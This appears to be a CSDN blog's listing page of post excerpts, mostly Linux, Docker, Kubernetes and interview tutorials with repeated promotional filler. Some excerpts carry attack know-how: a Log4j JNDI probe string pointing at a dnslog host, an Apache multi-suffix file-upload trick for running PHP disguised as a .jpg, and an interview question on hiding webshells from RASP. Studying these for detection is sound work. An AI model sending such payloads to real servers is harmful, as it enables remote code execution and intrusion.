- 博客(311)
- 收藏
- 关注
RSS订阅原创 VMware虚拟机安装win11教程(1),2024年最新程序员必会知识
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
2024-04-18 13:05:34
394
1
原创 VMware虚拟机安装openKylin(开放)麒麟系统_vmware麒麟,Linux运维攒了一个月的面试题及解答
典型还是自定义都无所谓,在使用上没啥大区别,就是自定义可以自己进行一些设置。
2024-04-18 13:05:03
310
原创 Sirius:一款功能强大的通用漏洞扫描工具_sirius 漏洞,2024年最新网络安全基础学习教程
我们建议广大研究人员在Docker环境下安装和使用Sirius,因此我们首先需要在本地设备上安装并配置好Docker容器环境,请注意,一定要安装好docker和docker-compose。现如今,信息安全社区仍然是收集网络安全情报数据最佳且最有利的来源,而且社区本身的表现经常会优于商业性质的安全供应商,这也是Sirius的主要优势之一。3、Sirius API:一个API服务,用于访问存储在Mongo数据库中的数据;4、Sirius Web:一个Web UI接口,允许用户查看和管理他们的数据管道;
2024-04-18 09:20:38
350
原创 SICTF Round#3 WP-Misc方向,网络安全架构师教你如何突破瓶颈
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。flag格式为SICTF{黑客所接入的IP地址|黑客所创建的用户名|黑客所加入的用户组|黑客创建的计划名|创建计划任务的对象后门所处的路径(小写盘符…恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。
2024-04-18 09:20:07
374
原创 Philippe Kruchten:技术传奇与4+1架构视图模型_软件工程 巨匠
在软件工程的广阔天地中,Philippe Kruchten的名字犹如一颗耀眼的星辰,他提出的4+1架构视图模型在国际标准的竞争擂台上显得格外突出。他不仅是4+1架构视图模型的创始人,也是软件工程领域的重要推动者。他的工作经历涵盖了从理论研究到实际应用的全过程,这种跨界的背景让他在设计4+1模型时能够兼顾理论和实践。Kruchten的早期生涯始于工程和计算机科学的学习,这为他后来在软件架构领域的探索奠定了坚实的基础。4+1模型包括逻辑视图、开发视图、过程视图、物理视图和场景视图,每个视图针对系统的不同方面。
2024-04-18 05:44:22
640
原创 PDF转换工具,2024年Linux运维开发进阶课程
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。另外,本书还为读者提供了大量的Linux学习资料和Ubuntu安装镜像文件,供读者免费下载。需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。
2024-04-18 05:43:51
776
原创 Log4j 远程代码执行漏洞检测_fofa搜索log4j漏洞(1),2024年最新网络安全编程基础学习
【代码】Log4j 远程代码执行漏洞检测_fofa搜索log4j漏洞(1),2024年最新网络安全编程基础学习。
2024-04-18 02:00:31
180
原创 log4j RCE漏洞原理分析及检测_log4j 漏洞监测(1),【一步教学,一步到位
漏洞检测时,可以使用 ${jndi:ldap://http://xxx.dnslog.cn} ,如果攻击成功,目标服务器将会从 xxx.dnslog.cn 下载jndi字节流,下载之前首先得连接dnslog.cn进行xxx.dnslog.cn的域名解析,获得真实ip地址。因此,如果攻击者能够控制日志打印的内容,就可以使目标服务器从攻击者指定的任意url地址下载代码字节流,攻击者在字节流中附带的代码就会在目标服务器上执行。攻击检测后,如果发现 dnslog.cn 中刷新到了dns解析记录,就表示探测成功。
2024-04-18 01:59:30
352
原创 linux基础面试题(46个汇总),Linux运维开发者跳槽必备
本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。linux命令’hash’管理着一个内置的哈希表,记录了已执行过的命令的完整路径, 用该命令可以打印出你所使用过的命令以及执行的次数。-p 与-n 参数相同,但此处的包括了文件的路径。
2024-04-17 22:31:15
756
原创 linux基础知识点总结--基础篇_test this media &; install
本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。用户账户,密码,宿主目录,登录shell 保存到配置文件中,/etc/passwd /etc/shadow。-qi:查看指定软件包的名称,版本,许可证,用途描述等详细信息。
2024-04-17 22:30:44
460
1
原创 Linux Centos7 网络配置无法ping通内外网,怒斩腾讯和阿里的Offer
重启网卡:systemctl restart network 或 service network restart。2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?3、现在给你三百台服务器,你怎么对他们进行管理?
2024-04-17 17:53:12
787
原创 Linux Centos7 网络配置无法ping通内外网(1),2024年最新Kotlin可能带来的一个深坑
*按 i 键开始修改该文件,修改完成后,按 Esc 键。按英文 : 键,按 wq 键进行保存设置。
2024-04-17 17:52:42
305
原创 Java中高级核心知识全面解析——初探Linux&Linux文件系统概览(什么是Inode&Linux目录树)
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
2024-04-17 14:23:37
634
原创 Java中高级核心知识全面解析——Linux基本命令(切换、增删改查、压缩文件
分别对应文件的属主(owner),属组(group)和其他用户(other),通过这样的机制来限制哪些用户、哪些组可以对特定的文件进行什么样的操作。vim 文件------>进入文件----->命令模式------>按i进入编辑模式----->编辑文件 ------->按Esc进入底行模式----->输入:wq/q!代表强制退出不保存。一般为文件的创建者,谁创建了该文件,就天然的成为该文件的所有者,用ls ‐ahl命令可以看到文件的所有者 也可以使用chown 用户名 文件名来修改文件的所有者。
2024-04-17 14:23:06
569
原创 EasyMicrobiome-易扩增子、易宏基因组等分析流程依赖常用软件、脚本文件和数据库注释文件_mpa_voct22_chocophlansgb_202412
Pavian桑基图:https://fbreitwieser.shinyapps.io/pavian/ 在线可视化:,左侧菜单,Upload sample set (temp/bracken/*.report),支持多样本同时上传;(可选) 单样本注释,5m,50G大数据库较5G库注释比例提高10~20%。),分别代表多个和单个字符。Kraken2可以快速完成读长(read)层面的物种注释和定量,还可以进行重叠群(contig)、基因(gene)、宏基因组组装基因组(MAG/bin)层面的序列物种注释。
2024-04-17 10:46:23
814
原创 EasyMetagenome易宏基因组——简单易用的宏基因组分析流程-来自刘永鑫团队的秘密武器
contamtemp/hr/unmatched质控结果汇总。
2024-04-17 10:45:52
582
原创 chrome插件,装这个就够了_chrome插件 c++(1),2024年最新资深网络安全面试题
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。
2024-04-17 07:04:17
628
原创 Chrome插件 WEB 网页数据采集和爬虫程序_chrome插件爬虫开发
常用应对方式是更换终端IP,比如用代理。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。不过,无论是何种方式,都要随着目标网站的更新迭代,做相应的适配,否则会出现程序无效的情况,而这是一个耗时耗力的过程🙂。验证码就是用来拦截爬虫程序的,常见有字符图片验证码(数字+字母+中文,再来点干扰线跟字符变形,增加识别成本),也会有逻辑交互类,以及手机/邮箱接收验证码。
2024-04-17 07:03:46
1929
原创 37岁中年男,面试十几家公司后成功找到工作_37面试啥工作
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。A账户创建了权限为766的文件夹adir,该文件夹中有B账户的文件password.txt,权限为B账户的700,请问B账户能否读取到adir/password.txt文件的内容 (★)实现一个一句话webshell,绕过RASP的方式有哪些,绕过机器学习检测的方式有哪些,绕过AST-Tree的方式有哪些(★★)
2024-04-17 03:19:45
755
原创 37、Linux中Xsync数据同步备份工具,2024年最新Linux运维程序员架构之路该如何继续学习
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
2024-04-17 03:19:14
824
原创 在Excel把两个单元格的内容,合并后显示在第三个单元格_满足两个单元格条件第三个单元格合并
同样,"&"符号两侧的空格用于插入一个空格作为分隔符,如果不需要分隔符则不加。16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?
2024-04-16 09:17:22
336
原创 在CentOS上安装Docker引擎_yum install docker-ce docker-ce-cli containerd
Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的。
2024-04-16 09:16:52
423
原创 什么是网络安全中的供应链攻击?(1),通用流行框架大全
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
2024-04-16 05:16:29
995
原创 什么是网络安全CTF 有何意义?到底该如何入门?_defcon ctf
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方二维码免费领取🆓👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享**(安全链接,放心点击)**👈。
2024-04-16 05:15:57
686
原创 【Linux】基础开发工具使用 --- gcc_gcc命令需要使用命令行开发者工具(2)
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。🧋函数库又分成了动态库与静态库两种,动态库又叫共享库,其提供的能力是被所有人共享的,就像学校外的网吧一样,你给了钱就能上网,但万一有一天网吧倒闭了,所有的学生都不能去那家网吧上网了。之后查询出的文件的数据类型就表明其是由静态链接构成的了。🧋在链接的时候我们所用到的函数并不完全是我们自己的,因此需要与库建立联系,从而可以使用库里面的函数。自动将文件编译到编译环节结束,此时的文件的内容已变成了汇编语言,同时文件的后缀为。
2024-04-16 00:09:30
601
原创 【Linux】基础开发工具使用 --- gcc_gcc命令需要使用命令行开发者工具(1)
gcc -o printf printf.o //从.o文件开始编译。gcc -o printf printf.c //从头开始编译。
2024-04-16 00:08:59
466
原创 【Linux】一文掌握Linux权限_针对普通用户而言,某目录就算没有执行权也可以进入该目录
其实默认权限只是系统给我们看到的,不管是普通文件还是目录文件,其实都具有起始权限,也就是最开始的权限,普通文件的起始权限为:666,目录文件的起始权限为:777,而系统为了更好的控制文件权限,系统会自带默认的权限掩码,我们可以用umask进行查看,umask 0八进制数 进行修改默认的权限掩码。我们可以很清晰的知道,一个普通文件的rwx,r代表可以查看该文件,w表示可以对该文件的内容进行修改,x表示该文件可以被执行,那么对于一个目录来说,rwx又意味着什么呢?w(可写):可以在该目录下创建新的文件或目录。
2024-04-16 00:07:56
543
原创 【Linux】一文掌握Linux基本指令(下)_linux向下搜索字符串
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。inux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。: 用于查看日历等时间信息,如只有一个参数,则表示年份(1-9999),如有两个参数,则表示月份和年份。
2024-04-16 00:07:25
823
原创 【Linux】Linux私有组,主要组和附加组,2024年最新【绝对干货
uid=1006(qtai) gid=1006(qtai) 组=1006(qtai),3001(cwu)uid=1005(gaosh5) gid=3000(zmedu) 组=3000(zmedu)
2024-04-16 00:06:22
409
原创 【linux】linux基础命令-chage详解,Linux运维开发面试题目
gaosh3:!!第一个字段为:用户名;**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。****需要这份系统化的资料的朋友,可以添加V获取:vip1024b (备注运维)**!**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2024-04-16 00:05:51
124
原创 【Linux】Linux之间如何互传文件(详细讲解)_linux把文件传到另一个linux
是一种更强大的文件复制工具,它可以在本地和远程之间复制文件,还可以用于备份。它也支持SSH,因此传输是安全的。(img-ng6sfVDq-1713197070411)]是基于SSH的,因此它在传输文件时是加密的。这是一种简单且常用的方法。👉专__注👈:专注主流机器人、人工智能等相关领域的开发、测试技术。也是基于SSH的,它为文件传输提供了一个交互式界面。👉荣__誉👈:阿里云博客专家博主、51CTO技术博主。👉公众号👈:测试开发自动化【获取源码+商业合作】👉博__主👈:米码收割机。24b (备注运维)**
2024-04-16 00:04:48
833
原创 【Linux】 Apache配置文件详解,颠覆认知
Include conf.d/*.conf #读取/etc/httpd/conf/conf.d/目录中所有以.conf结尾的文件。31 ServerRoot “/etc/httpd” #apache配置文件的根目录。ServerRoot “/etc/httpd” #用于指定Apache运行的根目录。DocumentRoot “/var/www/html” #网页文件存放的目录。Include conf.d/*.conf #包含的子配置文件。42 Listen 80 #监听的端口。
2024-04-16 00:04:16
311
原创 【linux】 apache多后缀文件解析漏洞复现,2024年最新冲刺7天拿下Offer
在apache与php的结合的网站中,php处理的是.php文件的解析,而apache只负责解析和接受http的请求,Php将.php文件解释执行完毕后,将生成的HTML代码发送给apache,再由 apache将HTML代码发送给客户端。一般的网站可以上传图片,我们把图片的名字命名为 gaosh.php.jpg, 文件名的内容写php代码,然后上传,网站管理人员以为是jpg图片,事实上我们写的是php代码。从这里可以看到,虽然还是php代码,但是文件名没有出现php,这个文件就被当作txt文件来处理了。
2024-04-16 00:03:14
375
原创 【Linux 初学篇】(3)时间日期和查找指令、压缩和解压
在 linux 中,每个文件有所有者(创建该文件的用户)、所在组(创建该文件用户所在的组)、其他组的概念。在添加用户时,可以指定将该用户添加到哪个组中,同样的用 root 的管理权限可以改变某个用户所在的组。如果这是一个文件,则该数字为1,如果这是一个目录,则该数字=该目录的子目录数。2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?除文件的所有者和所在组的用户外,系统的其它用户都是文件的其他组。一般文件被哪个用户创建的,该用户就自然成为了该文件的所有者。
2024-04-16 00:02:43
909
原创 【Linux 6】通过Shell编程实现定时备份数据库,细节爆炸
Linux Shell中的变量分为系统变量和用户自定义变量。HOMEHOME、HOMEPWD、SHELLSHELL、SHELLUSER等,比如echo $HOME显示当前shell中所有变量:set(1)基本语法:定义变量:变量名=值撤销变量:unset 变量声明静态变量:readonly变量,注意,不能unset(2)定义变量的规则:变量名称可以由字母、数字和下划线组成,但是不能以数字开头。等号两侧不能有空格变量名称一般习惯为大写,这是一个规范,遵守即可。
2024-04-16 00:02:12
724
原创 【Linux 1】Linux入门,2024年最新Linux运维多线程实现方式及并发与同步
1、桥接模式桥接模式表示虚拟机与主机在同一网段下,也就相当于局域网,如果IP地址为192.168.100.129,那么网段就是192.168.100,也就是说虚拟机ip最多会有255个,这样就有了局限性,容易造成IP冲突。2、NAT模式虚拟机中是独立的网络,通过代理与主机互通,不会造成IP冲突。3、仅主机模式只有本机能用的虚拟机,不建议使用。三、克隆和快照1、克隆一般用于项目部署2、快照相当于SVN,是Linux系统的版本管理手段四、XShell和Xftp。
2024-04-15 23:59:46
656
原创 【Leetcode】2369,2024年最新字节跳动+京东+360+网易面试题整理
不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!例如,子数组 [3,4,5] ,但是子数组 [1,3,5] 不符合要求。存在一种有效划分,返回 true ,否则,返回 false。由 3 个相等元素组成,例如,子数组 [4,4,4]。:数组可以划分成子数组 [4,4] 和 [4,5,6]。由 2 个相等元素组成,例如,子数组 [2,2]。这是一种有效划分,所以返回 true。
2024-04-15 23:58:43
412
原创 【Kubernetes】k8s的安全管理详细说明【SA配置、k8s安装dashboard、资源限制
官网里面呢,有一个网址,这个就是dashboard的获取地址了,反正地址就是这个,可以在windows上直接打开,然后复制到虚拟机里面,也可以在linux里面wget或curl【但是这个网站是国外的,需要添加解析,有点难访问,而且解析并不是配置后一直能用,这个破网址就折腾了我一上午,艹】因为我的集群是没有外网的,所以我在上面有外网的机器上docker pull以后,上传到我服务器的,如果你是下载的我的镜像,你也需要这么做。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
2024-04-15 23:58:12
710
原创 【Kubernetes】k8s的安全管理详细说明【role赋权和clusterrole赋权详细配置说明】
先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!由于文件比较多,这里只是将部分目录截图出来,全套包含大厂
2024-04-15 23:57:41
721
原创 第一天运维笔试题_找出 tmp目录下,属主不是root 且文件名不以f开头
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。7.查找/目录下最后创建时间是3天前,后缀是*.log的文件**
2024-04-12 17:51:02
245
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人